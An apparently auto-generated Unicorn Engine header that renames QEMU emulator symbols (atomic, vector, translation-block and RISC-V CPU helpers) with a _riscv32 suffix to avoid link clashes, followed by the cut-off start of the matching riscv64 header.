#define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_riscv32
#define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_riscv32
#define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_riscv32
#define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_riscv32
#define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_riscv32
#define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_riscv32
#define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_riscv32
#define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_riscv32
#define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_riscv32
#define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_riscv32
#define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_riscv32
#define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_riscv32
#define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_riscv32
#define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_riscv32
#define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_riscv32
#define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_riscv32
#define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_riscv32
#define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_riscv32
#define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_riscv32
#define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_riscv32
#define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_riscv32
#define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_riscv32
#define helper_atomic_xchgb helper_atomic_xchgb_riscv32
#define helper_atomic_fetch_addb helper_atomic_fetch_addb_riscv32
#define helper_atomic_fetch_andb helper_atomic_fetch_andb_riscv32
#define helper_atomic_fetch_orb helper_atomic_fetch_orb_riscv32
#define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_riscv32
#define helper_atomic_add_fetchb helper_atomic_add_fetchb_riscv32
#define helper_atomic_and_fetchb helper_atomic_and_fetchb_riscv32
#define helper_atomic_or_fetchb helper_atomic_or_fetchb_riscv32
#define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_riscv32
#define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_riscv32
#define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_riscv32
#define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_riscv32
#define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_riscv32
#define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_riscv32
#define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_riscv32
#define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_riscv32
#define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_riscv32
#define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_riscv32
#define helper_atomic_xchgw_le helper_atomic_xchgw_le_riscv32
#define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_riscv32
#define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_riscv32
#define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_riscv32
#define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_riscv32
#define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_riscv32
#define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_riscv32
#define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_riscv32
#define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_riscv32
#define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_riscv32
#define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_riscv32
#define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_riscv32
#define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_riscv32
#define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_riscv32
#define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_riscv32
#define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_riscv32
#define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_riscv32
#define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_riscv32
#define helper_atomic_xchgw_be helper_atomic_xchgw_be_riscv32
#define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_riscv32
#define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_riscv32
#define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_riscv32
#define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_riscv32
#define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_riscv32
#define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_riscv32
#define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_riscv32
#define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_riscv32
#define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_riscv32
#define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_riscv32
#define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_riscv32
#define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_riscv32
#define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_riscv32
#define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_riscv32
#define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_riscv32
#define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_riscv32
#define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_riscv32
#define helper_atomic_xchgl_le helper_atomic_xchgl_le_riscv32
#define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_riscv32
#define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_riscv32
#define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_riscv32
#define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_riscv32
#define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_riscv32
#define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_riscv32
#define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_riscv32
#define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_riscv32
#define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_riscv32
#define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_riscv32
#define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_riscv32
#define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_riscv32
#define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_riscv32
#define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_riscv32
#define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_riscv32
#define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_riscv32
#define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_riscv32
#define helper_atomic_xchgl_be helper_atomic_xchgl_be_riscv32
#define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_riscv32
#define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_riscv32
#define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_riscv32
#define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_riscv32
#define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_riscv32
#define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_riscv32
#define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_riscv32
#define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_riscv32
#define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_riscv32
#define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_riscv32
#define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_riscv32
#define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_riscv32
#define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_riscv32
#define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_riscv32
#define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_riscv32
#define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_riscv32
#define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_riscv32
#define helper_atomic_xchgq_le helper_atomic_xchgq_le_riscv32
#define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_riscv32
#define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_riscv32
#define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_riscv32
#define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_riscv32
#define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_riscv32
#define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_riscv32
#define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_riscv32
#define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_riscv32
#define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_riscv32
#define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_riscv32
#define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_riscv32
#define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_riscv32
#define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_riscv32
#define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_riscv32
#define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_riscv32
#define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_riscv32
#define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_riscv32
#define helper_atomic_xchgq_be helper_atomic_xchgq_be_riscv32
#define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_riscv32
#define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_riscv32
#define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_riscv32
#define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_riscv32
#define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_riscv32
#define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_riscv32
#define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_riscv32
#define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_riscv32
#define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_riscv32
#define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_riscv32
#define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_riscv32
#define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_riscv32
#define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_riscv32
#define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_riscv32
#define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_riscv32
#define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_riscv32
#define cpu_ldub_code cpu_ldub_code_riscv32
#define cpu_lduw_code cpu_lduw_code_riscv32
#define cpu_ldl_code cpu_ldl_code_riscv32
#define cpu_ldq_code cpu_ldq_code_riscv32
#define helper_div_i32 helper_div_i32_riscv32
#define helper_rem_i32 helper_rem_i32_riscv32
#define helper_divu_i32 helper_divu_i32_riscv32
#define helper_remu_i32 helper_remu_i32_riscv32
#define helper_shl_i64 helper_shl_i64_riscv32
#define helper_shr_i64 helper_shr_i64_riscv32
#define helper_sar_i64 helper_sar_i64_riscv32
#define helper_div_i64 helper_div_i64_riscv32
#define helper_rem_i64 helper_rem_i64_riscv32
#define helper_divu_i64 helper_divu_i64_riscv32
#define helper_remu_i64 helper_remu_i64_riscv32
#define helper_muluh_i64 helper_muluh_i64_riscv32
#define helper_mulsh_i64 helper_mulsh_i64_riscv32
#define helper_clz_i32 helper_clz_i32_riscv32 #define helper_ctz_i32 helper_ctz_i32_riscv32 #define helper_clz_i64 helper_clz_i64_riscv32 #define helper_ctz_i64 helper_ctz_i64_riscv32 #define helper_clrsb_i32 helper_clrsb_i32_riscv32 #define helper_clrsb_i64 helper_clrsb_i64_riscv32 #define helper_ctpop_i32 helper_ctpop_i32_riscv32 #define helper_ctpop_i64 helper_ctpop_i64_riscv32 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_riscv32 #define helper_exit_atomic helper_exit_atomic_riscv32 #define helper_gvec_add8 helper_gvec_add8_riscv32 #define helper_gvec_add16 helper_gvec_add16_riscv32 #define helper_gvec_add32 helper_gvec_add32_riscv32 #define helper_gvec_add64 helper_gvec_add64_riscv32 #define helper_gvec_adds8 helper_gvec_adds8_riscv32 #define helper_gvec_adds16 helper_gvec_adds16_riscv32 #define helper_gvec_adds32 helper_gvec_adds32_riscv32 #define helper_gvec_adds64 helper_gvec_adds64_riscv32 #define helper_gvec_sub8 helper_gvec_sub8_riscv32 #define helper_gvec_sub16 helper_gvec_sub16_riscv32 #define helper_gvec_sub32 helper_gvec_sub32_riscv32 #define helper_gvec_sub64 helper_gvec_sub64_riscv32 #define helper_gvec_subs8 helper_gvec_subs8_riscv32 #define helper_gvec_subs16 helper_gvec_subs16_riscv32 #define helper_gvec_subs32 helper_gvec_subs32_riscv32 #define helper_gvec_subs64 helper_gvec_subs64_riscv32 #define helper_gvec_mul8 helper_gvec_mul8_riscv32 #define helper_gvec_mul16 helper_gvec_mul16_riscv32 #define helper_gvec_mul32 helper_gvec_mul32_riscv32 #define helper_gvec_mul64 helper_gvec_mul64_riscv32 #define helper_gvec_muls8 helper_gvec_muls8_riscv32 #define helper_gvec_muls16 helper_gvec_muls16_riscv32 #define helper_gvec_muls32 helper_gvec_muls32_riscv32 #define helper_gvec_muls64 helper_gvec_muls64_riscv32 #define helper_gvec_neg8 helper_gvec_neg8_riscv32 #define helper_gvec_neg16 helper_gvec_neg16_riscv32 #define helper_gvec_neg32 helper_gvec_neg32_riscv32 #define helper_gvec_neg64 helper_gvec_neg64_riscv32 #define helper_gvec_abs8 helper_gvec_abs8_riscv32 #define helper_gvec_abs16 helper_gvec_abs16_riscv32 #define helper_gvec_abs32 helper_gvec_abs32_riscv32 #define helper_gvec_abs64 helper_gvec_abs64_riscv32 #define helper_gvec_mov helper_gvec_mov_riscv32 #define helper_gvec_dup64 helper_gvec_dup64_riscv32 #define helper_gvec_dup32 helper_gvec_dup32_riscv32 #define helper_gvec_dup16 helper_gvec_dup16_riscv32 #define helper_gvec_dup8 helper_gvec_dup8_riscv32 #define helper_gvec_not helper_gvec_not_riscv32 #define helper_gvec_and helper_gvec_and_riscv32 #define helper_gvec_or helper_gvec_or_riscv32 #define helper_gvec_xor helper_gvec_xor_riscv32 #define helper_gvec_andc helper_gvec_andc_riscv32 #define helper_gvec_orc helper_gvec_orc_riscv32 #define helper_gvec_nand helper_gvec_nand_riscv32 #define helper_gvec_nor helper_gvec_nor_riscv32 #define helper_gvec_eqv helper_gvec_eqv_riscv32 #define helper_gvec_ands helper_gvec_ands_riscv32 #define helper_gvec_xors helper_gvec_xors_riscv32 #define helper_gvec_ors helper_gvec_ors_riscv32 #define helper_gvec_shl8i helper_gvec_shl8i_riscv32 #define helper_gvec_shl16i helper_gvec_shl16i_riscv32 #define helper_gvec_shl32i helper_gvec_shl32i_riscv32 #define helper_gvec_shl64i helper_gvec_shl64i_riscv32 #define helper_gvec_shr8i helper_gvec_shr8i_riscv32 #define helper_gvec_shr16i helper_gvec_shr16i_riscv32 #define helper_gvec_shr32i helper_gvec_shr32i_riscv32 #define helper_gvec_shr64i helper_gvec_shr64i_riscv32 #define helper_gvec_sar8i helper_gvec_sar8i_riscv32 #define helper_gvec_sar16i helper_gvec_sar16i_riscv32 #define 
helper_gvec_sar32i helper_gvec_sar32i_riscv32 #define helper_gvec_sar64i helper_gvec_sar64i_riscv32 #define helper_gvec_shl8v helper_gvec_shl8v_riscv32 #define helper_gvec_shl16v helper_gvec_shl16v_riscv32 #define helper_gvec_shl32v helper_gvec_shl32v_riscv32 #define helper_gvec_shl64v helper_gvec_shl64v_riscv32 #define helper_gvec_shr8v helper_gvec_shr8v_riscv32 #define helper_gvec_shr16v helper_gvec_shr16v_riscv32 #define helper_gvec_shr32v helper_gvec_shr32v_riscv32 #define helper_gvec_shr64v helper_gvec_shr64v_riscv32 #define helper_gvec_sar8v helper_gvec_sar8v_riscv32 #define helper_gvec_sar16v helper_gvec_sar16v_riscv32 #define helper_gvec_sar32v helper_gvec_sar32v_riscv32 #define helper_gvec_sar64v helper_gvec_sar64v_riscv32 #define helper_gvec_eq8 helper_gvec_eq8_riscv32 #define helper_gvec_ne8 helper_gvec_ne8_riscv32 #define helper_gvec_lt8 helper_gvec_lt8_riscv32 #define helper_gvec_le8 helper_gvec_le8_riscv32 #define helper_gvec_ltu8 helper_gvec_ltu8_riscv32 #define helper_gvec_leu8 helper_gvec_leu8_riscv32 #define helper_gvec_eq16 helper_gvec_eq16_riscv32 #define helper_gvec_ne16 helper_gvec_ne16_riscv32 #define helper_gvec_lt16 helper_gvec_lt16_riscv32 #define helper_gvec_le16 helper_gvec_le16_riscv32 #define helper_gvec_ltu16 helper_gvec_ltu16_riscv32 #define helper_gvec_leu16 helper_gvec_leu16_riscv32 #define helper_gvec_eq32 helper_gvec_eq32_riscv32 #define helper_gvec_ne32 helper_gvec_ne32_riscv32 #define helper_gvec_lt32 helper_gvec_lt32_riscv32 #define helper_gvec_le32 helper_gvec_le32_riscv32 #define helper_gvec_ltu32 helper_gvec_ltu32_riscv32 #define helper_gvec_leu32 helper_gvec_leu32_riscv32 #define helper_gvec_eq64 helper_gvec_eq64_riscv32 #define helper_gvec_ne64 helper_gvec_ne64_riscv32 #define helper_gvec_lt64 helper_gvec_lt64_riscv32 #define helper_gvec_le64 helper_gvec_le64_riscv32 #define helper_gvec_ltu64 helper_gvec_ltu64_riscv32 #define helper_gvec_leu64 helper_gvec_leu64_riscv32 #define helper_gvec_ssadd8 helper_gvec_ssadd8_riscv32 #define helper_gvec_ssadd16 helper_gvec_ssadd16_riscv32 #define helper_gvec_ssadd32 helper_gvec_ssadd32_riscv32 #define helper_gvec_ssadd64 helper_gvec_ssadd64_riscv32 #define helper_gvec_sssub8 helper_gvec_sssub8_riscv32 #define helper_gvec_sssub16 helper_gvec_sssub16_riscv32 #define helper_gvec_sssub32 helper_gvec_sssub32_riscv32 #define helper_gvec_sssub64 helper_gvec_sssub64_riscv32 #define helper_gvec_usadd8 helper_gvec_usadd8_riscv32 #define helper_gvec_usadd16 helper_gvec_usadd16_riscv32 #define helper_gvec_usadd32 helper_gvec_usadd32_riscv32 #define helper_gvec_usadd64 helper_gvec_usadd64_riscv32 #define helper_gvec_ussub8 helper_gvec_ussub8_riscv32 #define helper_gvec_ussub16 helper_gvec_ussub16_riscv32 #define helper_gvec_ussub32 helper_gvec_ussub32_riscv32 #define helper_gvec_ussub64 helper_gvec_ussub64_riscv32 #define helper_gvec_smin8 helper_gvec_smin8_riscv32 #define helper_gvec_smin16 helper_gvec_smin16_riscv32 #define helper_gvec_smin32 helper_gvec_smin32_riscv32 #define helper_gvec_smin64 helper_gvec_smin64_riscv32 #define helper_gvec_smax8 helper_gvec_smax8_riscv32 #define helper_gvec_smax16 helper_gvec_smax16_riscv32 #define helper_gvec_smax32 helper_gvec_smax32_riscv32 #define helper_gvec_smax64 helper_gvec_smax64_riscv32 #define helper_gvec_umin8 helper_gvec_umin8_riscv32 #define helper_gvec_umin16 helper_gvec_umin16_riscv32 #define helper_gvec_umin32 helper_gvec_umin32_riscv32 #define helper_gvec_umin64 helper_gvec_umin64_riscv32 #define helper_gvec_umax8 helper_gvec_umax8_riscv32 #define helper_gvec_umax16 
helper_gvec_umax16_riscv32 #define helper_gvec_umax32 helper_gvec_umax32_riscv32 #define helper_gvec_umax64 helper_gvec_umax64_riscv32 #define helper_gvec_bitsel helper_gvec_bitsel_riscv32 #define cpu_restore_state cpu_restore_state_riscv32 #define page_collection_lock page_collection_lock_riscv32 #define page_collection_unlock page_collection_unlock_riscv32 #define free_code_gen_buffer free_code_gen_buffer_riscv32 #define tcg_exec_init tcg_exec_init_riscv32 #define tb_cleanup tb_cleanup_riscv32 #define tb_flush tb_flush_riscv32 #define tb_phys_invalidate tb_phys_invalidate_riscv32 #define tb_gen_code tb_gen_code_riscv32 #define tb_exec_lock tb_exec_lock_riscv32 #define tb_exec_unlock tb_exec_unlock_riscv32 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_riscv32 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv32 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_riscv32 #define tb_check_watchpoint tb_check_watchpoint_riscv32 #define cpu_io_recompile cpu_io_recompile_riscv32 #define tb_flush_jmp_cache tb_flush_jmp_cache_riscv32 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_riscv32 #define translator_loop_temp_check translator_loop_temp_check_riscv32 #define translator_loop translator_loop_riscv32 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_riscv32 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_riscv32 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_riscv32 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_riscv32 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_riscv32 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_riscv32 #define unassigned_mem_ops unassigned_mem_ops_riscv32 #define floatx80_infinity floatx80_infinity_riscv32 #define dup_const_func dup_const_func_riscv32 #define gen_helper_raise_exception gen_helper_raise_exception_riscv32 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_riscv32 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_riscv32 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_riscv32 #define gen_helper_cpsr_read gen_helper_cpsr_read_riscv32 #define gen_helper_cpsr_write gen_helper_cpsr_write_riscv32 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_riscv32 #define riscv_cpu_mmu_index riscv_cpu_mmu_index_riscv32 #define riscv_cpu_exec_interrupt riscv_cpu_exec_interrupt_riscv32 #define riscv_cpu_fp_enabled riscv_cpu_fp_enabled_riscv32 #define riscv_cpu_swap_hypervisor_regs riscv_cpu_swap_hypervisor_regs_riscv32 #define riscv_cpu_virt_enabled riscv_cpu_virt_enabled_riscv32 #define riscv_cpu_set_virt_enabled riscv_cpu_set_virt_enabled_riscv32 #define riscv_cpu_force_hs_excep_enabled riscv_cpu_force_hs_excep_enabled_riscv32 #define riscv_cpu_set_force_hs_excep riscv_cpu_set_force_hs_excep_riscv32 #define riscv_cpu_claim_interrupts riscv_cpu_claim_interrupts_riscv32 #define riscv_cpu_update_mip riscv_cpu_update_mip_riscv32 #define riscv_cpu_set_rdtime_fn riscv_cpu_set_rdtime_fn_riscv32 #define riscv_cpu_set_mode riscv_cpu_set_mode_riscv32 #define riscv_cpu_get_phys_page_debug riscv_cpu_get_phys_page_debug_riscv32 #define riscv_cpu_do_transaction_failed riscv_cpu_do_transaction_failed_riscv32 #define riscv_cpu_do_unaligned_access riscv_cpu_do_unaligned_access_riscv32 #define riscv_cpu_tlb_fill riscv_cpu_tlb_fill_riscv32 #define riscv_cpu_do_interrupt riscv_cpu_do_interrupt_riscv32 #define riscv_get_csr_ops riscv_get_csr_ops_riscv32 #define riscv_set_csr_ops riscv_set_csr_ops_riscv32 #define 
riscv_csrrw riscv_csrrw_riscv32 #define riscv_csrrw_debug riscv_csrrw_debug_riscv32 #define riscv_cpu_get_fflags riscv_cpu_get_fflags_riscv32 #define riscv_cpu_set_fflags riscv_cpu_set_fflags_riscv32 #define helper_set_rounding_mode helper_set_rounding_mode_riscv32 #define helper_fmadd_s helper_fmadd_s_riscv32 #define helper_fmadd_d helper_fmadd_d_riscv32 #define helper_fmsub_s helper_fmsub_s_riscv32 #define helper_fmsub_d helper_fmsub_d_riscv32 #define helper_fnmsub_s helper_fnmsub_s_riscv32 #define helper_fnmsub_d helper_fnmsub_d_riscv32 #define helper_fnmadd_s helper_fnmadd_s_riscv32 #define helper_fnmadd_d helper_fnmadd_d_riscv32 #define helper_fadd_s helper_fadd_s_riscv32 #define helper_fsub_s helper_fsub_s_riscv32 #define helper_fmul_s helper_fmul_s_riscv32 #define helper_fdiv_s helper_fdiv_s_riscv32 #define helper_fmin_s helper_fmin_s_riscv32 #define helper_fmax_s helper_fmax_s_riscv32 #define helper_fsqrt_s helper_fsqrt_s_riscv32 #define helper_fle_s helper_fle_s_riscv32 #define helper_flt_s helper_flt_s_riscv32 #define helper_feq_s helper_feq_s_riscv32 #define helper_fcvt_w_s helper_fcvt_w_s_riscv32 #define helper_fcvt_wu_s helper_fcvt_wu_s_riscv32 #define helper_fcvt_s_w helper_fcvt_s_w_riscv32 #define helper_fcvt_s_wu helper_fcvt_s_wu_riscv32 #define helper_fclass_s helper_fclass_s_riscv32 #define helper_fadd_d helper_fadd_d_riscv32 #define helper_fsub_d helper_fsub_d_riscv32 #define helper_fmul_d helper_fmul_d_riscv32 #define helper_fdiv_d helper_fdiv_d_riscv32 #define helper_fmin_d helper_fmin_d_riscv32 #define helper_fmax_d helper_fmax_d_riscv32 #define helper_fcvt_s_d helper_fcvt_s_d_riscv32 #define helper_fcvt_d_s helper_fcvt_d_s_riscv32 #define helper_fsqrt_d helper_fsqrt_d_riscv32 #define helper_fle_d helper_fle_d_riscv32 #define helper_flt_d helper_flt_d_riscv32 #define helper_feq_d helper_feq_d_riscv32 #define helper_fcvt_w_d helper_fcvt_w_d_riscv32 #define helper_fcvt_wu_d helper_fcvt_wu_d_riscv32 #define helper_fcvt_d_w helper_fcvt_d_w_riscv32 #define helper_fcvt_d_wu helper_fcvt_d_wu_riscv32 #define helper_fclass_d helper_fclass_d_riscv32 #define riscv_raise_exception riscv_raise_exception_riscv32 #define helper_raise_exception helper_raise_exception_riscv32 #define helper_uc_riscv_exit helper_uc_riscv_exit_riscv32 #define helper_csrrw helper_csrrw_riscv32 #define helper_csrrs helper_csrrs_riscv32 #define helper_csrrc helper_csrrc_riscv32 #define helper_sret helper_sret_riscv32 #define helper_mret helper_mret_riscv32 #define helper_wfi helper_wfi_riscv32 #define helper_tlb_flush helper_tlb_flush_riscv32 #define pmp_hart_has_privs pmp_hart_has_privs_riscv32 #define pmpcfg_csr_write pmpcfg_csr_write_riscv32 #define pmpcfg_csr_read pmpcfg_csr_read_riscv32 #define pmpaddr_csr_write pmpaddr_csr_write_riscv32 #define pmpaddr_csr_read pmpaddr_csr_read_riscv32 #define gen_intermediate_code gen_intermediate_code_riscv32 #define riscv_translate_init riscv_translate_init_riscv32 #define restore_state_to_opc restore_state_to_opc_riscv32 #define cpu_riscv_init cpu_riscv_init_riscv32 #define helper_fcvt_l_s helper_fcvt_l_s_riscv32 #define helper_fcvt_lu_s helper_fcvt_lu_s_riscv32 #define helper_fcvt_s_l helper_fcvt_s_l_riscv32 #define helper_fcvt_s_lu helper_fcvt_s_lu_riscv32 #define helper_fcvt_l_d helper_fcvt_l_d_riscv32 #define helper_fcvt_lu_d helper_fcvt_lu_d_riscv32 #define helper_fcvt_d_l helper_fcvt_d_l_riscv32 #define helper_fcvt_d_lu helper_fcvt_d_lu_riscv32 #define gen_helper_tlb_flush gen_helper_tlb_flush_riscv32 #define riscv_fpr_regnames riscv_fpr_regnames_riscv32 
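/*
 * Context for these renames: Unicorn compiles the QEMU sources once per
 * target architecture and links every target into a single libunicorn, so
 * each global symbol must be given an architecture-specific suffix (here
 * `_riscv32`) to avoid multiple-definition errors at link time. A minimal
 * sketch of the idea, using a hypothetical symbol `foo`:
 *
 *     // foo.c is compiled once per target.
 *     // riscv32 build: #define foo foo_riscv32  -> object defines foo_riscv32()
 *     // riscv64 build: #define foo foo_riscv64  -> object defines foo_riscv64()
 *     int foo(int x) { return x + 1; }
 *
 * Both objects can then coexist in the same library.
 */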
#define riscv_int_regnames riscv_int_regnames_riscv32 #endif
unicorn-2.1.1/qemu/riscv64.h
/* Autogen header for Unicorn Engine - DO NOT MODIFY */ #ifndef UNICORN_AUTOGEN_riscv64_H #define UNICORN_AUTOGEN_riscv64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _riscv64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_riscv64 #define reg_read reg_read_riscv64 #define reg_write reg_write_riscv64 #define uc_init uc_init_riscv64 #define uc_add_inline_hook uc_add_inline_hook_riscv64 #define uc_del_inline_hook uc_del_inline_hook_riscv64 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv64 #define use_idiv_instructions use_idiv_instructions_riscv64 #define arm_arch arm_arch_riscv64 #define tb_target_set_jmp_target tb_target_set_jmp_target_riscv64 #define have_bmi1 have_bmi1_riscv64 #define have_popcnt have_popcnt_riscv64 #define have_avx1 have_avx1_riscv64 #define have_avx2 have_avx2_riscv64 #define have_isa have_isa_riscv64 #define have_altivec have_altivec_riscv64 #define have_vsx 